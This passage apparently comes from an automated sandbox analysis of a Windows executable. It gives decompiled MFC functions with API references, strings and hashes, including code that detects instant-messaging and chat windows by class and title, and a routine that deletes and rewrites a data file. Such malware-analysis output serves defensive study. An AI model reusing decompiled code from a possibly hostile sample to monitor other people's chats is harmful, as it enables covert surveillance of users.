Opcode Fuzzy Hash: 89d81a815a518c5910fccd5ed1f3c1e0cf7e1cd9a2264864083e33c37371d238
Instruction Fuzzy Hash: 914182B5A00205AFDB11ABB1DD86FFE7778EF48344F10053AF61AA22D2DB745D458B24

Uniqueness

Uniqueness Score: -1.00%

Function 0041A5AD, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 138
windowCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E0041A5AD(void* __ecx, void* __ebp) {
				signed int _v68;
				signed int _v76;
				char _v80;
				void* _v88;
				intOrPtr _v104;
				void* __esi;
				void* _t25;
				long _t37;
				intOrPtr _t41;
				void* _t80;
				intOrPtr _t81;
				void* _t83;

				_t83 = __ebp;
				_t25 = E0043E4E0(0x4413dc, __ebp);
				_push(__ecx);
				_push(_t83);
				_t80 = __ecx;
				L0043DF94();
				_push(1);
				_push(0x808080);
				_push(0x10101);
				_push(0xefefef);
				_push(__ecx);
				_push(0x3e8);
				L00404F47(_t25, __ecx + 0x28c, __ecx);
				_push(0);
				_push(( *(_t80 + 0x288))[0x40]);
				_push(0x42e);
				L0043E2E8();
				_push( &(( *(_t80 + 0x288))[1]));
				_push(0x42d);
				L0043E06C();
				_push( &(( *(_t80 + 0x288))[0x1a]));
				_push(0x42f);
				L0043E06C();
				_push( &(( *(_t80 + 0x288))[0x26]));
				_push(0x430);
				L0043E06C();
				_push( &(( *(_t80 + 0x288))[0x33]));
				_push(0x432);
				L0043E06C();
				_push(0x44a);
				L0043E066();
				_t37 = SendMessageA(( *(_t80 + 0x288))[8], 0x14e,  *( *(_t80 + 0x288)), 0);
				_push(0x430);
				L0043E066();
				SendMessageA( *(_t37 + 0x20), 0xcc, 0x2a, 0);
				if(( *(_t80 + 0x288))[0x33] == 0) {
					_push( *((intOrPtr*)(E00429029( &_v80, 0xe025))));
					_v68 = _v68 & 0x00000000;
					_push(0x432);
					L0043E066();
					L0043E15C();
					_v76 = _v76 | 0xffffffff;
					L0043DD36();
				}
				_t76 = _t80 + 0x174;
				E0040CF63(_t80 + 0x174, 0x323232, 1);
				if(_t80 != 0) {
					_t41 =  *((intOrPtr*)(_t80 + 0x20));
				} else {
					_t41 = 0;
				}
				E0040CF2E(_t76, 1, 0x4550cc, 0, 0, 0, 0x5a2, _t41);
				_t77 = _t80 + 0x60;
				E0040CF63(_t80 + 0x60, 0x323232, 1);
				if(_t80 != 0) {
					_t81 =  *((intOrPtr*)(_t80 + 0x20));
				} else {
					_t81 = 0;
				}
				E0040CF2E(_t77, 1, 0x4550cc, 0, 0, 0, 0x5a8, _t81);
				 *[fs:0x0] = _v104;
				return 0;
			}

0x0041a5ad
0x0041a5b2
0x0041a5b7
0x0041a5b9
0x0041a5bc
0x0041a5be
0x0041a5c3
0x0041a5c5
0x0041a5ca
0x0041a5cf
0x0041a5d4
0x0041a5d5
0x0041a5e0
0x0041a5eb
0x0041a5ef
0x0041a5f5
0x0041a5fa
0x0041a60a
0x0041a60b
0x0041a610
0x0041a620
0x0041a621
0x0041a626
0x0041a63d
0x0041a63e
0x0041a63f
0x0041a653
0x0041a654
0x0041a659
0x0041a664
0x0041a66d
0x0041a683
0x0041a685
0x0041a688
0x0041a695
0x0041a6a4
0x0041a6b7
0x0041a6b9
0x0041a6c0
0x0041a6c5
0x0041a6cc
0x0041a6d1
0x0041a6da
0x0041a6da
0x0041a6df
0x0041a6ef
0x0041a6f8
0x0041a6fe
0x0041a6fa
0x0041a6fa
0x0041a6fa
0x0041a714
0x0041a719
0x0041a721
0x0041a72a
0x0041a730
0x0041a72c
0x0041a72c
0x0041a72c
0x0041a741
0x0041a750
0x0041a758

APIs

__EH_prolog.LIBCMT ref: 0041A5B2
#4710.MFC42 ref: 0041A5BE
#5951.MFC42(0000042E,?,00000000,?,00EFEFEF,00010101,00808080,00000001), ref: 0041A5FA
#5953.MFC42(0000042D,?,0000042E,?,00000000,?,00EFEFEF,00010101,00808080,00000001), ref: 0041A610
#5953.MFC42(0000042F,?,0000042D,?,0000042E,?,00000000,?,00EFEFEF,00010101,00808080,00000001), ref: 0041A626
#5953.MFC42(00000430,?,0000042F,?,0000042D,?,0000042E,?,00000000,?,00EFEFEF,00010101,00808080,00000001), ref: 0041A63F
#5953.MFC42(00000432,?,00000430,?,0000042F,?,0000042D,?,0000042E,?,00000000,?,00EFEFEF,00010101,00808080,00000001), ref: 0041A659
#3092.MFC42(0000044A,00000432,?,00000430,?,0000042F,?,0000042D,?,0000042E,?,00000000,?,00EFEFEF,00010101,00808080), ref: 0041A66D
SendMessageA.USER32(?,0000014E,?,00000000), ref: 0041A683
#3092.MFC42(00000430,?,00000000,0000044A,00000432,?,00000430,?,0000042F,?,0000042D,?,0000042E,?,00000000), ref: 0041A688
SendMessageA.USER32(?,000000CC,0000002A,00000000), ref: 0041A695

Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A

#3092.MFC42(00000432,00000000), ref: 0041A6C5
#6199.MFC42(00000432,00000000), ref: 0041A6CC
#800.MFC42(00000432,00000000), ref: 0041A6DA

Strings

222, xrefs: 0041A6E5

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #5953$#3092$MessageSend$#1168#4710#537#5951#6199#800H_prologLoadString
String ID: 222
API String ID: 228317318-4245286173
Opcode ID: 440cf8652119af8dd790a6132a813aa16af4df44761e9812e4acfba998555b14
Instruction ID: 759ecd59eee1237085b63a1ab2b0d48173b285e401b441356b5d19800c0247d0
Opcode Fuzzy Hash: 440cf8652119af8dd790a6132a813aa16af4df44761e9812e4acfba998555b14
Instruction Fuzzy Hash: 4B411D71341310BBE624A722CC46FBB7699EB48B14F40051DF655AB2D1DEF96C408759

Uniqueness

Uniqueness Score: -1.00%

Function 0040EDEF, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 108
windowCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040EDEF(void* __ecx) {
				signed int _t47;
				long _t50;
				intOrPtr* _t51;
				void* _t52;
				long _t53;
				signed int _t54;
				signed int _t55;
				signed int _t56;
				void* _t87;
				void* _t89;

				_t47 = E0043E4E0(0x44023c, _t89);
				_t87 = __ecx;
				_push(1);
				L0043E08A();
				if(_t47 != 0) {
					 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x64)) + 0x68c)) =  *((intOrPtr*)(__ecx + 0x268));
					E004285DB( *((intOrPtr*)(__ecx + 0x64)),  *((intOrPtr*)(__ecx + 0x60)));
					_t50 = SendMessageA( *(__ecx + 0x248), 0x1004, 0, 0);
					 *(_t89 - 0x18) = _t50;
					 *((intOrPtr*)(_t89 - 0x10)) = 0;
					if(_t50 > 0) {
						do {
							_push(0);
							_push( *((intOrPtr*)(_t89 - 0x10)));
							_push(_t89 - 0x14);
							L0043E25E();
							 *(_t89 - 4) = 0;
							E00428515( *((intOrPtr*)(_t87 + 0x60)),  *((intOrPtr*)(_t89 - 0x14)));
							 *(_t89 - 4) =  *(_t89 - 4) | 0xffffffff;
							L0043DD36();
							 *((intOrPtr*)(_t89 - 0x10)) =  *((intOrPtr*)(_t89 - 0x10)) + 1;
						} while ( *((intOrPtr*)(_t89 - 0x10)) <  *(_t89 - 0x18));
					}
					_push("mc.dat");
					_t51 = _t89 - 0x18;
					_push(0x4558c8);
					_push(_t51);
					L0043DE20();
					_push( *_t51);
					 *(_t89 - 4) = 1;
					_t52 = E0042860B( *((intOrPtr*)(_t87 + 0x60)));
					 *(_t89 - 4) =  *(_t89 - 4) | 0xffffffff;
					L0043DD36();
					_push(0x47a);
					L0043E066();
					_t53 = SendMessageA( *(_t52 + 0x20), 0x147, 0, 0);
					_push(0x421);
					 *( *(_t87 + 0x64) + 0x358) = _t53;
					L0043DFA6();
					if(_t53 != 0 &&  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x60)) + 0x4b0)) != 0) {
						_push(1);
						_pop(0);
					}
					_t54 =  *(_t87 + 0x64);
					_push(0x48d);
					 *((char*)(_t54 + 0x13b)) = 0;
					L0043DFA6();
					_push(0x48e);
					_t55 = _t54 & 0xffffff00 | _t54 != 0x00000000;
					 *( *(_t87 + 0x64) + 0x148) = _t55;
					L0043DFA6();
					_push(0x48f);
					_t56 = _t55 & 0xffffff00 | _t55 != 0x00000000;
					 *( *(_t87 + 0x64) + 0x149) = _t56;
					L0043DFA6();
					_t47 = _t56 & 0xffffff00 | _t56 != 0x00000000;
					 *( *(_t87 + 0x64) + 0x14a) = _t47;
					L0043E03C();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t89 - 0xc));
				return _t47;
			}

0x0040edf4
0x0040edfd
0x0040edff
0x0040ee01
0x0040ee08
0x0040ee19
0x0040ee22
0x0040ee3c
0x0040ee40
0x0040ee43
0x0040ee46
0x0040ee48
0x0040ee48
0x0040ee4c
0x0040ee55
0x0040ee56
0x0040ee60
0x0040ee63
0x0040ee68
0x0040ee6f
0x0040ee74
0x0040ee7a
0x0040ee48
0x0040ee7f
0x0040ee84
0x0040ee87
0x0040ee8c
0x0040ee8d
0x0040ee92
0x0040ee97
0x0040ee9e
0x0040eea3
0x0040eeaa
0x0040eeaf
0x0040eeb6
0x0040eec5
0x0040eeca
0x0040eecf
0x0040eed7
0x0040eede
0x0040eeeb
0x0040eeed
0x0040eeed
0x0040eeee
0x0040eef1
0x0040eef8
0x0040eefe
0x0040ef06
0x0040ef0d
0x0040ef10
0x0040ef18
0x0040ef20
0x0040ef27
0x0040ef2a
0x0040ef32
0x0040ef3c
0x0040ef3f
0x0040ef47
0x0040ef4d
0x0040ef52
0x0040ef5a

APIs

__EH_prolog.LIBCMT ref: 0040EDF4
#6334.MFC42(00000001), ref: 0040EE01

Part of subcall function 004285DB: #825.MFC42(?,?,?,?,0040EE27,?,?,00000001), ref: 004285EE

SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040EE3C
#3301.MFC42(00000001,?,00000000,?,?,00000001), ref: 0040EE56

Part of subcall function 00428515: lstrlenA.KERNEL32(00000001), ref: 00428528
Part of subcall function 00428515: #823.MFC42(00000001), ref: 00428530
Part of subcall function 00428515: lstrcpyA.KERNEL32(?,00000001), ref: 0042854C

#800.MFC42(00000000,00000001,?,00000000,?,?,00000001), ref: 0040EE6F
#924.MFC42(?,004558C8,mc.dat,?,?,00000001), ref: 0040EE8D
#800.MFC42(00000000,?,004558C8,mc.dat,?,?,00000001), ref: 0040EEAA
#3092.MFC42(0000047A,00000000,?,004558C8,mc.dat,?,?,00000001), ref: 0040EEB6
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040EEC5
#4055.MFC42(00000421,?,?,00000001), ref: 0040EED7
#4055.MFC42(0000048D,00000421,?,?,00000001), ref: 0040EEFE
#4055.MFC42(0000048E,0000048D,00000421,?,?,00000001), ref: 0040EF18
#4055.MFC42(0000048F,0000048E,0000048D,00000421,?,?,00000001), ref: 0040EF32
#4853.MFC42(0000048F,0000048E,0000048D,00000421,?,?,00000001), ref: 0040EF47

Strings

mc.dat, xrefs: 0040EE7F

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #4055$#800MessageSend$#3092#3301#4853#6334#823#825#924H_prologlstrcpylstrlen
String ID: mc.dat
API String ID: 3471012821-4287095944
Opcode ID: adc1f95d8fcd1b8b7c74dc06287ab74d92a0c8d46913fc414a3effc011fee3e4
Instruction ID: e701eaf865acadef7edbecf5bf54880852a9a1e5a9996fc064e93e69b1f6b00f
Opcode Fuzzy Hash: adc1f95d8fcd1b8b7c74dc06287ab74d92a0c8d46913fc414a3effc011fee3e4
Instruction Fuzzy Hash: 7E41B1716007059FD714EF66C982AEEB7B5BF48704F04086EF246AB2E2DB789D01CB18

Uniqueness

Uniqueness Score: -1.00%

Function 0042860B, Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 89
fileCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0042860B(intOrPtr* __ecx) {
				void* _t45;
				CHAR* _t48;
				intOrPtr* _t53;
				intOrPtr* _t70;
				void* _t75;

				E0043E4E0(0x442f14, _t75);
				_t70 = __ecx;
				DeleteFileA( *(_t75 + 8));
				if( *((intOrPtr*)(_t70 + 0x4b0)) != 0) {
					L0043E486();
					 *(_t75 - 4) = 0;
					L0043DDDE();
					 *(_t75 - 4) = 1;
					L0043DDD8();
					 *(_t75 - 0x14) =  *(_t75 - 0x14) | 0xffffffff;
					_push(0);
					 *(_t75 - 4) = 2;
					 *((intOrPtr*)(_t75 - 0x20)) = 0x445490;
					 *((intOrPtr*)(_t75 - 0x18)) = 0;
					L0043DDD2();
					_t45 = _t75 - 0x20;
					_push(_t45);
					_push(0x1001);
					_push( *(_t75 + 8));
					 *(_t75 - 4) = 3;
					L0043E480();
					if(_t45 != 0) {
						 *(_t75 + 8) = 0;
						if( *((intOrPtr*)(_t70 + 0x4b0)) > 0) {
							_t53 = _t70;
							do {
								_push( *_t53);
								L0043E4B0();
								_push(0x4532cc);
								L0043E4B0();
								 *(_t75 + 8) =  &(( *(_t75 + 8))[1]);
								_t53 = _t53 + 4;
							} while ( *(_t75 + 8) <  *((intOrPtr*)(_t70 + 0x4b0)));
						}
						L0043E474();
						_push(_t75 + 8);
						L0043E276();
						 *(_t75 - 4) = 5;
						E0042AAFA( *(_t75 + 8));
						 *(_t75 - 4) = 3;
						L0043DD36();
						 *((intOrPtr*)(_t75 - 0x20)) = 0x445490;
						_push(1);
						 *(_t75 - 4) = 6;
						_pop(0);
					} else {
						 *((intOrPtr*)(_t75 - 0x20)) = 0x445490;
						 *(_t75 - 4) = 4;
					}
					L0043DD36();
					 *(_t75 - 4) =  *(_t75 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t75 - 0x20)) = 0x44547c;
					L0043E46E();
					_t48 = 0;
				} else {
					_t48 = 1;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t75 - 0xc));
				return _t48;
			}

0x00428610
0x0042861d
0x0042861f
0x0042862d
0x0042863b
0x00428643
0x00428646
0x0042864e
0x00428652
0x00428657
0x00428660
0x00428664
0x00428668
0x0042866b
0x0042866e
0x00428673
0x00428679
0x0042867a
0x0042867f
0x00428682
0x00428686
0x0042868d
0x0042869e
0x004286a1
0x004286a3
0x004286a5
0x004286a5
0x004286aa
0x004286af
0x004286b7
0x004286bc
0x004286c2
0x004286c5
0x004286a5
0x004286d0
0x004286db
0x004286dc
0x004286e3
0x004286e7
0x004286ed
0x004286f4
0x004286f9
0x004286fc
0x004286fe
0x00428702
0x0042868f
0x0042868f
0x00428692
0x00428692
0x00428706
0x0042870b
0x00428712
0x00428719
0x0042871e
0x0042862f
0x00428631
0x00428631
0x00428726
0x0042872e

APIs

__EH_prolog.LIBCMT ref: 00428610
DeleteFileA.KERNEL32(?,7741B980,00000000), ref: 0042861F
#533.MFC42 ref: 0042863B
#350.MFC42 ref: 00428646
#540.MFC42 ref: 00428652
#860.MFC42(00000000), ref: 0042866E
#5194.MFC42(?,00001001,?,00000000), ref: 00428686
#800.MFC42(?,?,00001001,?,00000000), ref: 00428706
#798.MFC42(?,?,00001001,?,00000000), ref: 00428719

Strings

|TD, xrefs: 00428712

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #350#5194#533#540#798#800#860DeleteFileH_prolog
String ID: |TD
API String ID: 3286372685-231495167
Opcode ID: c060ffc11bb77793de18164d3a9fd0bd52928181958fd8a8f41bc6fc7aee918b
Instruction ID: a7d5b4dd1822b50172ccdf9581838aa126aadad513d89915bc5e5d349a4f8513
Opcode Fuzzy Hash: c060ffc11bb77793de18164d3a9fd0bd52928181958fd8a8f41bc6fc7aee918b
Instruction Fuzzy Hash: 7431BE30902259EEDF14EFA5D981ADDBB70BF28308F60451EF402662C2DB785B44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040B2B5, Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 87
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040B2B5(void* __ecx) {
				char _t30;
				char** _t35;
				char** _t37;
				void* _t61;

				E0043E4E0(0x43fc78, _t61);
				if(IsWindow( *(_t61 + 8)) == 0 || strcmp( *(_t61 + 0xc), "__oxFrame.class__") != 0 || E0040FF68( *(_t61 + 8), 0, "__oxFrame.class__", 0, "Internet Explorer_Server", 0) == 0) {
					L9:
					_t30 = 0;
				} else {
					_push( *(_t61 + 8));
					_push(_t61 + 0xc);
					E0040FEA7();
					_t35 = _t61 - 0x14;
					_push(8);
					_push(_t35);
					 *(_t61 - 4) = 0;
					L0043DFD0();
					 *(_t61 - 4) = 1;
					if(strcmp( *_t35, "IM with ") == 0) {
						L5:
						 *((char*)(_t61 + 0xb)) = 1;
					} else {
						_t37 = _t61 - 0x10;
						_push(5);
						_push(_t37);
						L0043DFD0();
						 *((char*)(_t61 + 0xb)) = strcmp( *_t37, "Chat ") == 0;
						L0043DD36();
						 *((char*)(_t61 + 0xb)) = 0;
						if( *((intOrPtr*)(_t61 + 0xb)) != 0) {
							goto L5;
						}
					}
					 *(_t61 - 4) = 0;
					L0043DD36();
					if( *((intOrPtr*)(_t61 + 0xb)) == 0) {
						 *(_t61 - 4) =  *(_t61 - 4) | 0xffffffff;
						L0043DD36();
						goto L9;
					} else {
						 *(_t61 - 4) =  *(_t61 - 4) | 0xffffffff;
						L0043DD36();
						_t30 = 1;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0xc));
				return _t30;
			}

0x0040b2ba
0x0040b2ce
0x0040b3a1
0x0040b3a1
0x0040b30a
0x0040b30a
0x0040b310
0x0040b311
0x0040b318
0x0040b31b
0x0040b31d
0x0040b321
0x0040b324
0x0040b32e
0x0040b33d
0x0040b371
0x0040b371
0x0040b33f
0x0040b33f
0x0040b342
0x0040b344
0x0040b348
0x0040b360
0x0040b364
0x0040b36c
0x0040b36f
0x00000000
0x00000000
0x0040b36f
0x0040b378
0x0040b37b
0x0040b383
0x0040b395
0x0040b39c
0x00000000
0x0040b385
0x0040b385
0x0040b38c
0x0040b391
0x0040b391
0x0040b383
0x0040b3a8
0x0040b3b0

APIs

__EH_prolog.LIBCMT ref: 0040B2BA
IsWindow.USER32(?), ref: 0040B2C6
strcmp.MSVCRT ref: 0040B2DD

Part of subcall function 0040FF68: FindWindowExA.USER32 ref: 0040FF7F
Part of subcall function 0040FF68: FindWindowExA.USER32 ref: 0040FF90

Part of subcall function 0040FEA7: __EH_prolog.LIBCMT ref: 0040FEAC
Part of subcall function 0040FEA7: IsWindow.USER32(?), ref: 0040FEC5
Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 0040FEDC
Part of subcall function 0040FEA7: #823.MFC42(-000000C5), ref: 0040FEEA
Part of subcall function 0040FEA7: memset.MSVCRT ref: 0040FEF7
Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000D,-000000CA,?), ref: 0040FF0B
Part of subcall function 0040FEA7: #537.MFC42(?), ref: 0040FF13
Part of subcall function 0040FEA7: #825.MFC42(?,?), ref: 0040FF1F
Part of subcall function 0040FEA7: #535.MFC42(?,?), ref: 0040FF2C
Part of subcall function 0040FEA7: #800.MFC42(?,?), ref: 0040FF38

#4129.MFC42(?,00000008), ref: 0040B324
strcmp.MSVCRT ref: 0040B334
#4129.MFC42(?,00000005,?,00000008), ref: 0040B348
strcmp.MSVCRT ref: 0040B354
#800.MFC42(?,?,00000005,?,00000008), ref: 0040B364
#800.MFC42(?,00000008), ref: 0040B37B
#800.MFC42(?,00000008), ref: 0040B38C
#800.MFC42(?,00000008), ref: 0040B39C

Strings

Internet Explorer_Server, xrefs: 0040B2EF
__oxFrame.class__, xrefs: 0040B2D4, 0040B2D9, 0040B2F5
Chat , xrefs: 0040B34D
IM with , xrefs: 0040B329

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$Window$strcmp$#4129FindH_prologMessageSend$#535#537#823#825memset
String ID: Chat $IM with $Internet Explorer_Server$__oxFrame.class__
API String ID: 1234111086-110528233
Opcode ID: d57322620cefddb25537c271ce285b9440a05bde8707165ba44593b374412d4b
Instruction ID: b08ac53a7dfa84f5ae855337021f5146d19fccb7cf4186faee3b8bc53d0731ac
Opcode Fuzzy Hash: d57322620cefddb25537c271ce285b9440a05bde8707165ba44593b374412d4b
Instruction Fuzzy Hash: A121B171801148BECF15DF61DC81ADE7B64EF16364F20816FF815661D1EB389B48D65C

Uniqueness

Uniqueness Score: -1.00%

Function 0041C252, Relevance: 26.3, APIs: 6, Strings: 9, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0041C252(void* __eax) {

				_push("None");
				L0043DE26();
				_push("User defined");
				L0043DE26();
				_push("Open");
				L0043DE26();
				_push("Print");
				L0043DE26();
				_push("Explore");
				L0043DE26();
				_push("E-mail");
				L0043DE26();
				return __eax;
			}

0x0041c252
0x0041c25c
0x0041c261
0x0041c26b
0x0041c270
0x0041c27a
0x0041c27f
0x0041c289
0x0041c28e
0x0041c298
0x0041c29d
0x0041c2a7
0x0041c2ac

APIs

#537.MFC42(None,0041C24D), ref: 0041C25C
#537.MFC42(User defined,None,0041C24D), ref: 0041C26B
#537.MFC42(Open,User defined,None,0041C24D), ref: 0041C27A
#537.MFC42(Print,Open,User defined,None,0041C24D), ref: 0041C289
#537.MFC42(Explore,Print,Open,User defined,None,0041C24D), ref: 0041C298
#537.MFC42(E-mail,Explore,Print,Open,User defined,None,0041C24D), ref: 0041C2A7

Strings

WE, xrefs: 0041C275
Open, xrefs: 0041C270
WE, xrefs: 0041C257
WE, xrefs: 0041C266
E-mail, xrefs: 0041C29D
Explore, xrefs: 0041C28E
Print, xrefs: 0041C27F
User defined, xrefs: 0041C261
None, xrefs: 0041C252

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

